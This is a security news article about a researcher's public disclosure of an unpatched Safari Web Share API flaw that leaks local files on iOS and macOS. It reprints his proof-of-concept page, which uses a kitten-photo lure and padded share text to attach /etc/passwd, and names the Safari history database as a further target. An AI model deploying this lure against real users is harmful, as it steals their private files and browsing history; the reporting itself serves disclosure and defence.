Vulnerability in Apple Safari can be used to steal files stored on iOS or macOS

0

An unpatched vulnerability in Apple’s Safari web browser can allow hackers to steal files from iPhones and MacBooks

Any potential hacker could use an unpatched vulnerability in Apple’s Safari browser to steal arbitrary files from the victim’s iPhone powered by iOS 13.4.1/iOS 13.6, or MacBook/Apple PC being run on macOS Mojave 10.14.16/macOS Catalina 10.15.5.

Security researcher and founder of RedTeam, Pawel Wylecial discovered the vulnerability in April 2020 and informed the Apple security team about it. Apple responded to RedTeam that it was investigating the issue. However, it added that it would patch the vulnerability through an update only in 2021. Though Apple asked Wylecial to abstain from disclosing the vulnerability until it was patched, the Poland based security researcher decided Apple was taking way too long to address the issue and made his report public on 24th August 2020.

“Apple replied asking not to publish the details as they plan to address the issue in the Spring 2021 security update,” says Wylecial in the blog post.

The vulnerability is difficult to execute as it involves convincing the targeted victim to visit a malicious website and click on certain links but Wylecial says that it could be feasible considering the reward of stealing files from the iPhone/MacBook user.

Wylecial says the vulnerability lies in how Apple Web Share API allows the users to share links from Safari through third-party apps like emailing or messaging Apps.

“The problem is that file: scheme is allowed and when a website points to such URL unexpected behavior occurs. In case such a link is passed to the navigator.share function an actual file from the user file system is included in the shared message which leads to local file disclosure when a user is sharing it unknowingly,” says Wylecial.

To prove the vulnerability, Wylecial developed a fake website containing a single image of a kitten. The website urged visitors to share the kitten’s image with their friends using the share button on the page. When the victim opens the kitten’s image in their Safari browser on their iPhone or MacBook and presses the share button, the user is asked to select the emailing or messaging App he/she would like to use to share the image. When the victim selects to share it via email, the attacker’s code, in addition to adding the image URL, attaches an arbitrary file from the victim’s iPhone or MacBook.

Proof-of-concept:

Wylecial has given a sample proof-of-concept code snippet on his website.

This is the sample code used for the demonstration:

 

<html>
<script>
var opts = {text: ‘check out this cute kitten! http://somerandomimagewebsite.com/cat.jpg\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n’, url: ‘file:///etc/passwd’};
function run() {
navigator.share(opts);
}
</script>
<body>
Check out this cute kitten!
<br/>
<img width=”200px” height=”200px” src=”cat.jpg”>
<br/>
<button onclick=’run();’>share it with friends!</button>
</body>
</html>

He has also shared a video showing how the vulnerability can be exploited:

Wylecial says that the vulnerability could be used by potential hackers to steal the local passwd file, But a simple code change can enable the hacker to exfiltrate the entire Safari web history from an iPhone owner.

file:///private/var/mobile/Library/Safari/History.db

The vulnerability is doubly dangerous as the Mail app in both iOS and macOS does not show the attached file unless the victim scrolls down to the bottom of the message. Wyclecial says he has tested the PoC on iPhones running iOS 13.4.1,13.6 and MacBooks running on macOS Mojave 10.14.16 with Safari 13.1 and on macOS Catalina 10.15.5 with Safari 13.1.1.

You can check out the source code of Wylecial’s PoC website here.

Share.

About Author

"The Internet is the first thing that humanity has built that humanity doesn't understand, the largest experiment in anarchy that we have ever had." Eric Schmidt

Subscribe
Notify of
0 Comments
Inline Feedbacks
View all comments